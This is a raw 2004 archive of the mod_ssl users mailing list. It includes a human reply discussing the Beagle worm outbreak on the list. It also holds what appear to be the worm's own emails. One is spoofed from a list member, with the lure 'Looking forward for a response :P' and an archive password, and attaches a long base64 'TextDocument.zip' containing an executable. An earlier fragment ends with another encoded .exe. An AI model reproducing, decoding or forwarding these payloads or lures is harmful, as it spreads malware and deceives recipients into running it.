AAAAAAAAS0VSTkVMMzIuRExMAGFkdmFwaTMyLmRsbABTSEVMTDMyLmRsbAB1c2VyMzIuZGxs
AABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3Nl
S2V5AAAAU2hlbGxFeGVjdXRlQQAAAEZpbmRXaW5kb3dBAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAKAAAAAADAemIw
GsVSSQA+AAAAPgAADAAAAAAAAAAAACAAAAAAAAAAaGJjZ3FreXEuZXhlUEsFBgAAAAABAAEA
OgAAACo+AAAAAA==

----------bfbmwhmxqguumywluvob--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 21:41:35 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2B0E1A8A8B; Tue,  2 Mar 2004 21:41:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from scanner2.ics.uci.edu (scanner2.ics.uci.edu [128.195.1.36])
	by master.modssl.org (Postfix) with ESMTP id E7E93A8A81
	for ; Tue,  2 Mar 2004 21:41:21 +0100 (CET)
Received: from ics.uci.edu (doric.ics.uci.edu [128.195.20.215])
	by scanner2.ics.uci.edu (8.12.10/8.12.10) with ESMTP id i22Kek4J022243
	for ; Tue, 2 Mar 2004 12:40:46 -0800 (PST)
Message-ID: <4044F19F.4090203@ics.uci.edu>
Date: Tue, 02 Mar 2004 12:42:07 -0800
From: Joachim Feise 
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.6) Gecko/20040113
X-Accept-Language: en, de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: rse has beagle-a virus ?
References: <001901c3fd89$b856f7c0$c400a8c0@charon> <4040888B.5030000@w3works.com>
In-Reply-To: <4040888B.5030000@w3works.com>
X-Enigmail-Version: 0.83.1.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-ICS-MailScanner-smtp3: Found to be clean
X-ICS-MailScanner-SpamCheck-smtp3: not spam (whitelisted),
	SpamAssassin (score=-100, required 5, USER_IN_WHITELIST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joachim Feise 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dave Paris wrote on 2/28/2004 4:24:
> I vote
> to kick the .edu's off the listserv until they prove they've got an
> intellectual agility quotient above that of a small soapdish.  If this
> pisses off admins for .edu's, sorry .. life's a bitch, grab a helmet.

Now, there are .edu admins who actually know what they are doing.
Here our admins actively scan machines, and isolate infected ones from
the Net.

The last ones came from Lucent, anyway:
Received: from auemail2.firewall.lucent.com (auemail2.lucent.com [192.11.223.163])
	by master.modssl.org (Postfix) with ESMTP id E05B4A8A6F
	for ; Tue,  2 Mar 2004 09:33:45 +0100 (CET)
Received: from cinjjtu (h135-252-58-142.lucent.com [135.252.58.142])
	by auemail2.firewall.lucent.com (Switch-2.2.8/Switch-2.2.8) with SMTP id
i228Xe327008
	for ; Tue, 2 Mar 2004 02:33:40 -0600 (CST)

so the "real world" can't keep their machines clean, either...

-Joe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  2 21:53:19 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 23F1BA8A89; Tue,  2 Mar 2004 21:53:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cosmotrope (cosmotrope.scs.uiuc.edu [130.126.230.109])
	by master.modssl.org (Postfix) with SMTP id C819CA8A81
	for ; Tue,  2 Mar 2004 21:53:03 +0100 (CET)
Date: Tue, 02 Mar 2004 14:51:07 -0600
To: modssl-users@modssl.org
Subject: Weah, hello! :-)
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------mowgcdyxfrmjwalphsne"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------mowgcdyxfrmjwalphsne
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Looking forward for  a response :P

password for  archive: 54710

----------mowgcdyxfrmjwalphsne
Content-Type: application/octet-stream; name="TextDocument.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="TextDocument.zip"

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
